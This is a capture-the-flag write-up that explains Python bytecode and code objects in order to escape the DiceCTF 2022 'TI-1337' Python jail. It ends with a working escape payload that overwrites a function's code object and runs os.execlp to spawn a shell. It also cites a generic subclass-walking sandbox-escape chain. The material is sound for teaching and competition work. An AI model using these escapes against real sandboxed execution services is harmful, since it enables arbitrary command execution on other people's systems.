Last weekend Galhacktic Trendsetters sort of spontaneously decided to do DiceCTF 2022, months or years after most of us had done another CTF. It was a lot of fun and we placed 6th!
Back in the day the silver edition was the top of the line Texas Instruments calculator, but now the security is looking a little obsolete. Can you break it?
It’s yet another Python jail. We input a string and, after it makes
it through a gauntlet of checks and processing, it gets
exec
’d.
#!/usr/bin/env python3
import dis
import sys
= ["MAKE_FUNCTION", "CALL_FUNCTION", "CALL_FUNCTION_KW", "CALL_FUNCTION_EX"]
banned
= False
used_gift
def gift(target, name, value):
global used_gift
if used_gift: sys.exit(1)
= True
used_gift setattr(target, name, value)
print("Welcome to the TI-1337 Silver Edition. Enter your calculations below:")
= input("> ")
math if len(math) > 1337:
print("Nobody needs that much math!")
1)
sys.exit(= compile(math, "<math>", "exec")
code
= list(code.co_code)
bytecode = list(dis.get_instructions(code))
instructions for i, inst in enumerate(instructions):
if inst.is_jump_target:
print("Math doesn't need control flow!")
1)
sys.exit(= instructions[i+1].offset if i+1 < len(instructions) else len(bytecode)
nextoffset if inst.opname in banned:
+1].offset] = [-1]*(instructions[i+1].offset-inst.offset)
bytecode[inst.offset:instructions[i
= list(code.co_names)
names for i, name in enumerate(code.co_names):
if "__" in name: names[i] = "$INVALID$"
= code.replace(co_code=bytes(b for b in bytecode if b >= 0), co_names=tuple(names), co_stacksize=2**20)
code = {}
v exec(code, {"__builtins__": {"gift": gift}}, v)
if v: print("\n".join(f"{name} = {val}" for name, val in v.items()))
else: print("No results stored.")
More precisely, the gauntlet does the following:
- Check if our input is longer than 1337 characters; if so, error out. This is not a harsh limit.
- Compile our code and disassemble it using the
dis
module. If any instructionis_jump_target
, which generally means any kind of control flow, error out. Delete any of the banned operationsMAKE_FUNCTION
,CALL_FUNCTION
,CALL_FUNCTION_KW
, andCALL_FUNCTION_EX
from the assembled bytecode (this happens in two steps: first, by overwriting it with-1
s, and second, by filtering those out near the end). - Check our code for any names with double underscores, and replace
any such names in the code object with
$INVALID$
, which basically guarantees your code won’t run. - Execute the modified code object in an environment with a
gift
builtin and nothing else.
(The challenge also comes with a Dockerfile, which says that the flag is in a file with a random filename. This didn’t end up being particularly relevant though.)
FROM redpwn/jail:0.1.3
COPY --from=python:3.9 / /srv
COPY flag.txt /srv/
RUN chmod 444 /srv/flag.txt && mv /srv/flag.txt /srv/flag.`tr -dc A-Za-z0-9 < /dev/urandom | head -c 20`.txt
COPY ti1337se.py /srv/app/run
RUN chmod 755 /srv/app/run
I knew very little about Python bytecode and code objects before this
challenge. Bytecode is also an internal and unstable feature of the
interpreter, so there’s not much documentation. Still, the
dis
module has enough documentation of bytecode
instructions to get us by, and some of the special attributes of code
objects and such, which also appear in the challenge, are lightly
documented in the inspect
module. Finally, it’s not too hard to figure out some of the details
with a little experimentation and object introspection in a Python
interpreter. Let’s do that.
Diving into Python code objects
This goes into a bit more depth than necessary, but I thought it was interesting, and I couldn’t find a tutorial on Python code objects I thought was a good fit for our use case in ten minutes of searching, so I decided to write it up.
When you compile some Python source code via compile
,
you get a code object. As a trivial example, you could open an
interpreter and run the following to get a code object
co
:
>>> co = compile('1 + 2', '<math>', 'eval')
The second parameter to compile
is a filename and isn’t
important. The third parameter is a mode, either "eval"
or
"exec"
.
We can evaluate co
:
>>> eval(co)
3
(We could exec
it too, but the return value doesn’t come
out of exec
, so we can’t see our code object in action.
I’ll be using the eval
mode below in a few examples, but
most of the ideas are the same between the two modes.)
We can get a somewhat human-readable representation of this code
object’s instructions with dis.get_instructions
:
>>> import dis
>>> for inst in dis.get_instructions(co): print(inst)
='LOAD_CONST', opcode=100, arg=0, argval=3, argrepr='3', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=2, starts_line=None, is_jump_target=False) Instruction(opname
Note that you can call dis.dis
for a prettier, less
verbose printout (and also most of the dis
functions are
pretty smart and work with raw source code strings just as well as
compiled code objects):
>>> dis.dis('1 + 2')
1 0 LOAD_CONST 0 (3)
2 RETURN_VALUE
However, I found the verbose printout more educational and exclusively used it while doing the challenge, so I’ll stick with it here too.
Python’s bytecode is for a stack-based virtual machine of sorts. This
example just has two instructions: the first pushes 3 into the stack,
and the second returns the top value of the stack. Our code was so
simple that the addition was optimized away, so this example wasn’t that
illustrative. However, one thing to know already is that the bytecode
instruction doesn’t itself directly contain the constant 3. Instead, the
code object separately stores a tuple of all constants used by the code,
and the bytecode just contains a reference to it. The list of constants
used by a code object is in the attribute co_consts
:
>>> co.co_consts
3,) (
Though we cannot directly modify constants on a code object, we can
use the method replace
to get a new code object that’s
identical except for the list of constants.
>>> co2 = co.replace(co_consts=(4,))
>>> eval(co2)
4
Disassembling this new code object shows what appear to be different
instructions, which have the same opcodes but different
argval
s:
>>> for inst in dis.get_instructions(co2): print(inst)
='LOAD_CONST', opcode=100, arg=0, argval=4, argrepr='4', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=2, starts_line=None, is_jump_target=False) Instruction(opname
However, the two code objects have exactly the same bytecode.
>>> co.co_code, co2.co_code
b'd\x00S\x00', b'd\x00S\x00') (
The details of how bytecode is structured is fairly unimportant, but
if you’re curious, as of Python 3.6, all bytecode instructions are two
bytes: one byte for the opcode and one byte for the argument. Many
opcodes ignore their argument, as in the example above with
RETURN_VALUE
. Opcodes can also take multi-byte arguments,
up to four, by prepending additional “instructions” that have a special
opcode, EXTENDED_ARG
.
So if we look at the numeric values of each byte in this code object’s bytecode, we can read off the opcodes and arguments:
>>> [n for n in co.co_code]
100, 0, 83, 0] [
The bytecode has two instructions: opcode 100 with argument 0,
followed by opcode 83 with argument 0. This matches the
opcode
and arg
fields of the
Instruction
s we got from iterating over
dis.get_instructions(co)
. The argval
s differ
because the co_consts
associated with the code objects
differ, not because the bytecodes differ.
Let’s try the same thing for the code x + y
:
='LOAD_NAME', opcode=101, arg=0, argval='x', argrepr='x', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='LOAD_NAME', opcode=101, arg=1, argval='y', argrepr='y', offset=2, starts_line=None, is_jump_target=False)
Instruction(opname='BINARY_ADD', opcode=23, arg=None, argval=None, argrepr='', offset=4, starts_line=None, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=6, starts_line=None, is_jump_target=False) Instruction(opname
This code object has no associated constants. However,
co.co_names
is a tuple of variable names that the code
uses: ('x', 'y')
. The LOAD_NAME
opcodes take
arguments that reference variable names in co_names
, just
like the LOAD_CONST
opcodes earlier take arguments that
reference constants in co_consts
.
It’s worth noting that the same tuple is used for things like attribute accesses and method calls:
>>> co = compile('x.y.z()', '<math>', 'eval')
>>> co.co_names
'x', 'y', 'z')
(>>> for inst in dis.get_instructions(co): print(inst)
='LOAD_NAME', opcode=101, arg=0, argval='x', argrepr='x', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='LOAD_ATTR', opcode=106, arg=1, argval='y', argrepr='y', offset=2, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_METHOD', opcode=160, arg=2, argval='z', argrepr='z', offset=4, starts_line=None, is_jump_target=False)
Instruction(opname='CALL_METHOD', opcode=161, arg=0, argval=0, argrepr='', offset=6, starts_line=None, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=8, starts_line=None, is_jump_target=False) Instruction(opname
This example is also remarkable in another way: the opcode we’re
using to call x.y.z
is CALL_METHOD
, which is
not any of the banned opcodes!
= ["MAKE_FUNCTION", "CALL_FUNCTION", "CALL_FUNCTION_KW", "CALL_FUNCTION_EX"] banned
A more natural way to discover this fact is probably by scrolling
through the section of the dis
module documentation on Python
bytecode instructions and looking for names that contain the word
“CALL”. This will be very important later.
Let’s try something a bit more adventurous and compile a lambda
expression, lambda x, y: x + y
:
>>> co = compile('lambda x, y: x + y', '<math>', 'eval')
>>> co.co_names
()>>> for inst in dis.get_instructions(co): print(inst)
='LOAD_CONST', opcode=100, arg=0, argval=<code object <lambda> at 0x7fd18bc0e920, file "<math>", line 1>, argrepr='<code object <lambda> at 0x7fd18bc0e920, file "<math>", line 1>', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=1, argval='<lambda>', argrepr="'<lambda>'", offset=2, starts_line=None, is_jump_target=False)
Instruction(opname='MAKE_FUNCTION', opcode=132, arg=0, argval=0, argrepr='', offset=4, starts_line=None, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=6, starts_line=None, is_jump_target=False) Instruction(opname
I was a bit surprised to see an empty co_names
and no
BINARY_ADD
opcode anywhere, but the pretty-printed argument
values for the opcodes quickly reveal what’s going on. The
MAKE_FUNCTION
opcode takes two arguments on the stack, a
code object and a function name, and produces a function. That code
object used by the function has already been compiled and placed as a
constant attached to the outer code object:
>>> co.co_consts
<code object <lambda> at 0x7fd18bc0e870, file "<math>", line 1>, '<lambda>') (
If we examine and disassemble that code object, we see the names and
BINARY_ADD
opcode we’re expecting:
>>> co.co_consts[0].co_names
()>>> for inst in dis.get_instructions(co.co_consts[0]): print(inst)
='LOAD_FAST', opcode=124, arg=0, argval='x', argrepr='x', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='LOAD_FAST', opcode=124, arg=1, argval='y', argrepr='y', offset=2, starts_line=None, is_jump_target=False)
Instruction(opname='BINARY_ADD', opcode=23, arg=None, argval=None, argrepr='', offset=4, starts_line=None, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=6, starts_line=None, is_jump_target=False) Instruction(opname
Just kidding, the parameter names are in co_varnames
instead of co_names
.
>>> c.co_varnames
'x', 'y') (
As of time of writing, I don’t think the inspect
module documentation is entirely correct here. The first hit for
co_names
is a StackOverflow
question, which points to the source
code docstring as a more accurate source. There is also already an
issue in the bug
tracker.
Anyway, if we try to compile a lambda that references names that
aren’t arguments, they do appear in the inner code object’s
co_names
, and still don’t appear in the outer code
object:
>>> co = compile('lambda: x + y', '<math>', 'eval')
>>> co.co_names
()>>> co.co_consts[0].co_names
'x', 'y') (
Reorienting to the goal
Now that we understand a bit more about Python bytecode and code
objects, let’s think more about what we want to end up achieving. It’s
well-known that, even if you pass an empty dictionary as builtins to
exec
or eval
, it’s still insecure; some useful
references include Ned Batchelder’s Eval
really is dangeous and Gynvael Coldwind’s Python
“sandbox” escape.
Unfortunately, all these jailbreaks start with member accesses along
the lines of ().__class__.__bases__[0].__subclasses__()
,
which contain names with double underscores that the challenge replaces
in the code object with $INVALID$
, immediately breaking
them. One alternate avenue that seemed promising to me at first was
doing something with the func_globals
attribute of
gift
(or some other function), as suggested in, for
example, 2013
PlaidCTF writeup by wapiflapi; unfortunately, that attribute was renamed
to __globals__
in Python 3.0, so it fails in the same
way. Another idea is that it’s fine if strings contain double
underscores, and the gift
function lets us
setattr
once with string literals that could contain double
underscores. However, it’s really unclear what attribute we can set that
will help us make progress towards one of the above jailbreaks; we
really want getattr
. So it’s also not immediately apparent
if this is useful. Overall, I was not able to find any direct jailbreaks
of this form that didn’t use any names containing double
underscores.
However, we saw from our earlier experimentation with code objects
that, if we make a lambda and called it, names used by the lambda only
appear in the co_names
field of an inner code object, so
the challenge won’t notice them. Even an expression like
(lambda: ().__class__.__bases__[0].__subclasses__())()
would sail through the name check. The same goes for any opcodes and
control flow used by that lambda. So if we can figure out how to make
and call a single lambda, we’re basically done with the
challenge.
Of course, we can do neither of those things, at least not directly,
because MAKE_FUNCTION
and all the
CALL_FUNCTION
opcodes are banned. Let’s resolve the latter
obstacle first.
Calling a function without calling a function
We already saw that CALL_METHOD
is not banned, which
means that if we stick our lambda as an attribute onto something else,
we can call it via that attribute without using any banned opcodes. Most
built-in Python objects do not let you freely set attributes on them,
but fortunately, one type of built-in Python object for which this does
work is functions themselves. In sum, we could make and call a lambda
without any CALL_FUNCTION
opcodes with code like so:
= lambda: (); x.f = x; x.f() x
This disassembles to:
='LOAD_CONST', opcode=100, arg=0, argval=<code object <lambda> at 0x7fd18bc0e450, file "<math>", line 1>, argrepr='<code object <lambda> at 0x7fd18bc0e450, file "<math>", line 1>', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=1, argval='<lambda>', argrepr="'<lambda>'", offset=2, starts_line=None, is_jump_target=False)
Instruction(opname='MAKE_FUNCTION', opcode=132, arg=0, argval=0, argrepr='', offset=4, starts_line=None, is_jump_target=False)
Instruction(opname='STORE_NAME', opcode=90, arg=0, argval='x', argrepr='x', offset=6, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_NAME', opcode=101, arg=0, argval='x', argrepr='x', offset=8, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_NAME', opcode=101, arg=0, argval='x', argrepr='x', offset=10, starts_line=None, is_jump_target=False)
Instruction(opname='STORE_ATTR', opcode=95, arg=1, argval='f', argrepr='f', offset=12, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_NAME', opcode=101, arg=0, argval='x', argrepr='x', offset=14, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_METHOD', opcode=160, arg=1, argval='f', argrepr='f', offset=16, starts_line=None, is_jump_target=False)
Instruction(opname='CALL_METHOD', opcode=161, arg=0, argval=0, argrepr='', offset=18, starts_line=None, is_jump_target=False)
Instruction(opname='POP_TOP', opcode=1, arg=None, argval=None, argrepr='', offset=20, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=2, argval=None, argrepr='None', offset=22, starts_line=None, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=24, starts_line=None, is_jump_target=False) Instruction(opname
This sequence of opcodes would be the same if I replaced the trivial
lambda with any other lambda, and although it contains
MAKE_FUNCTION
, it doesn’t contain any of the banned
CALL
opcodes. Also note that we can use this strategy to
call the gift
function provided to us by the challenge
code. We can verify that this strategy works by inputting code such as
the following:
= gift; gift.f(gift, "foo", "bar"); x = gift.foo gift.f
This causes the server to respond with x = bar
, as
expected. This makes sense because the instructions corresponding to
this code do not contain any banned opcodes.
='LOAD_NAME', opcode=101, arg=0, argval='gift', argrepr='gift', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='LOAD_NAME', opcode=101, arg=0, argval='gift', argrepr='gift', offset=2, starts_line=None, is_jump_target=False)
Instruction(opname='STORE_ATTR', opcode=95, arg=1, argval='f', argrepr='f', offset=4, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_NAME', opcode=101, arg=0, argval='gift', argrepr='gift', offset=6, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_METHOD', opcode=160, arg=1, argval='f', argrepr='f', offset=8, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_NAME', opcode=101, arg=0, argval='gift', argrepr='gift', offset=10, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=0, argval='foo', argrepr="'foo'", offset=12, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=1, argval='bar', argrepr="'bar'", offset=14, starts_line=None, is_jump_target=False)
Instruction(opname='CALL_METHOD', opcode=161, arg=3, argval=3, argrepr='', offset=16, starts_line=None, is_jump_target=False)
Instruction(opname='POP_TOP', opcode=1, arg=None, argval=None, argrepr='', offset=18, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_NAME', opcode=101, arg=0, argval='gift', argrepr='gift', offset=20, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_ATTR', opcode=106, arg=2, argval='foo', argrepr='foo', offset=22, starts_line=None, is_jump_target=False)
Instruction(opname='STORE_NAME', opcode=90, arg=3, argval='x', argrepr='x', offset=24, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=2, argval=None, argrepr='None', offset=26, starts_line=None, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=28, starts_line=None, is_jump_target=False) Instruction(opname
The bigger obstacle is still the lack of MAKE_FUNCTION
opcodes, which we’ll think about next.
Making a function without making a function
First, note that the MAKE_FUNCTION
opcode wasn’t
“banned” in the same way that control flow was banned. When the
challenge code sees a MAKE_FUNCTION
opcode, it doesn’t bail
out, it deletes that instruction from the bytecode and carries
on. Imagine what would happen in the above code if this happened: the
STORE_NAME
instruction would store the function name
"<lambda>"
instead of the lambda into x
,
and the bytecode would limp along afterwards with an extra code object
floating on the stack. If we input:
= lambda: () x
The server responds:
= <lambda> x
To be absolutely clear, this is literally the string
"<lambda>"
and not the string representation of an
actual lambda, which whould look something like
<function <lambda> at 0x7fe204c37310>
instead.
With a little setup, we could easily imagine putting that code object into a variable and then doing other things with it. My experience with this step might have been unusual (compare e.g. the Organizers’ writeup1); but honestly, I didn’t think too hard about this; the first thing I tried worked:
= 0, lambda: () x, y
Intuitively, I expected that when this code functioned normally, it
would get 0 and a lambda onto the stack and then put the top two
elements of the stack into x
and y
. However,
if the lambda never gets made then its “ingredients” would be on top of
the stack and would go into x
and y
instead.
And it does seem to do that. The server’s response to this code is:
= <code object <lambda> at 0x7f59d0ddab30, file "<math>", line 1>
x = <lambda> y
Once you get this result, it’s not really important to understand
why, since you can just use x
in the rest of the exploit.
But for the curious, let’s disassemble it and take a closer look:
>>> co = compile('x, y = 0, lambda: ()', '<math>', 'exec')
>>> for inst in dis.get_instructions(co): print(inst)
='LOAD_CONST', opcode=100, arg=0, argval=0, argrepr='0', offset=0, starts_line=1, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=1, argval=<code object <lambda> at 0x7fe7360fa3a0, file "<math>", line 1>, argrepr='<code object <lambda> at 0x7fe7360fa3a0, file "<math>", line 1>', offset=2, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=2, argval='<lambda>', argrepr="'<lambda>'", offset=4, starts_line=None, is_jump_target=False)
Instruction(opname='MAKE_FUNCTION', opcode=132, arg=0, argval=0, argrepr='', offset=6, starts_line=None, is_jump_target=False)
Instruction(opname='ROT_TWO', opcode=2, arg=None, argval=None, argrepr='', offset=8, starts_line=None, is_jump_target=False)
Instruction(opname='STORE_NAME', opcode=90, arg=0, argval='x', argrepr='x', offset=10, starts_line=None, is_jump_target=False)
Instruction(opname='STORE_NAME', opcode=90, arg=1, argval='y', argrepr='y', offset=12, starts_line=None, is_jump_target=False)
Instruction(opname='LOAD_CONST', opcode=100, arg=3, argval=None, argrepr='None', offset=14, starts_line=None, is_jump_target=False)
Instruction(opname='RETURN_VALUE', opcode=83, arg=None, argval=None, argrepr='', offset=16, starts_line=None, is_jump_target=False) Instruction(opname
We can tabulate what happens when each instruction is executed. The
parentheses indicate what constant from co_consts
or name
from co_names
are referenced by the argument. The stack is
listed from bottom to top.
Instruction | Effect | Stack |
---|---|---|
LOAD_CONST 0 (0) | Push 0 onto stack | 0 |
LOAD_CONST 1 (code object) | Push code object | 0, code object |
LOAD_CONST 2 ("<lambda>" ) |
Push string "<lambda>" |
0, code object, "<lambda>" |
MAKE_FUNCTION | Pop code object and name; push lambda function | 0, lambda |
ROT_TWO | Swap 0 and lambda on stack | lambda, 0 |
STORE_NAME 0 (x) | Put 0 into x |
lambda |
STORE_NAME 1 (y) | Put lambda into y |
(empty) |
LOAD_CONST 3 (None) | Push None onto stack | None |
RETURN_VALUE | Return None from this code | (empty) |
Two asides here:
- Why does this stack juggling occur? Why doesn’t Python just do one
of pushing/constructing the values and storing them into
x
andy
in the opposite order? I didn’t investigate this in detail, but my guess is that it’s necessary in general to keep the execution order of expressions and assignments as all left-to-right as one might expect. It also sort of motivates why the same evaluation order of subexpressions is deliberately unspecified in C/C++ and similar languages. - Also note that the fact that all this code compiles to pushing two
things onto the stack and then directly popping them into two variables
is not actually that intuitive if you think about it more. An expression
like
a, b = x, y
is “supposed to” make a tuple(x, y)
and then unpack the tuple into the variablesa
andb
, since an assignment likea = x, y
works and puts a tuple intoa
. If you disassemblea = x, y
, you’ll see aBUILD_TUPLE
instruction; conversely, if you disassemblea, b = x
, you’ll see anUNPACK_SEQUENCE
instruction. Fortunately for my code, Python optimized out the tuple packing and unpacking, just like it optimized out1 + 2 = 3
in the first example we looked at.
If we delete the MAKE_FUNCTION
instruction and let the
rest of the opcodes do what they do, the effects become:
Instruction | Effect | Stack |
---|---|---|
LOAD_CONST 0 (0) | Push 0 onto stack | 0 |
LOAD_CONST 1 (code object) | Push code object | 0, code object |
LOAD_CONST 2 ("<lambda>" ) |
Push string "<lambda>" |
0, code object, "<lambda>" |
ROT_TWO | Swap code object and lambda on stack | 0, "<lambda>" , code object |
STORE_NAME 0 (x) | Put code object into x |
0, "<lambda>" |
STORE_NAME 1 (y) | Put "<lambda>" into y |
0 |
LOAD_CONST 3 (None) | Push None onto stack | 0, None |
RETURN_VALUE | Return None from this code | 0 |
In any case, we now know how to get a code object of our design into a variable. Unfortunately, but unsurprisingly, we can’t directly call code objects as if they’re functions. If we try
= 0, lambda: (); gift.f() gift.f, x
we get this error:
Traceback (most recent call last):"/app/run", line 39, in <module>
File exec(code, {"__builtins__": {"gift": gift}}, v)
"<math>", line 1, in <module>
File TypeError: 'code' object is not callable
If you want a code object to run, you can’t run it directly; you have to call a function that has a code object inside it. Can we make that happen? Wait, how exactly is the code object run by a function associated with it?
We can discover this (yet again) the inspect
module docs, or (yet again) StackOverflow:
functions have the function attribute
__code__
(also known asfunc_code
in older versions) from which you can obtain the function’s code object
The million-dollar question now is: is this attribute writable? Let’s run a trivial example to check:
>>> f = lambda: 1
>>> g = lambda: 2
>>> f.__code__ = g.__code__
>>> f()
2
It is, which means we do have a way to get our custom,
exploit-containing code object to execute. If we set the
__code__
attribute of an existing function to our code
object, and then call that function, we can get our code object to run!
And it turns out that gift
is both an exiting object and
the exact tool we need to set a __code__
attribute.
The final exploit
The exploit is even easier than I expected at first: it’s possible to
call built-ins in the body of the lambda/code object we’re making, so we
can just __import__
what we want instead of having to hunt
for a subclass of object
. This makes sense because we’re
sort of replacing the code in the body of gift
with our own
code and then running it, and it makes sense that we would be able to
call __import__
from the body of gift
, which
doesn’t execute in the “jail”. So we can just get the flag with an
exploit like:
= gift; b,c = 0,lambda: __import__("os").execlp("sh","sh"); gift.f(gift, "__code__", b); gift.f() gift.f
This pops a shell, so we cd ..
and
cat flag*
and we’re done!
dice{i_sh0uldve_upgr4ded_to_th3_color_edit10n}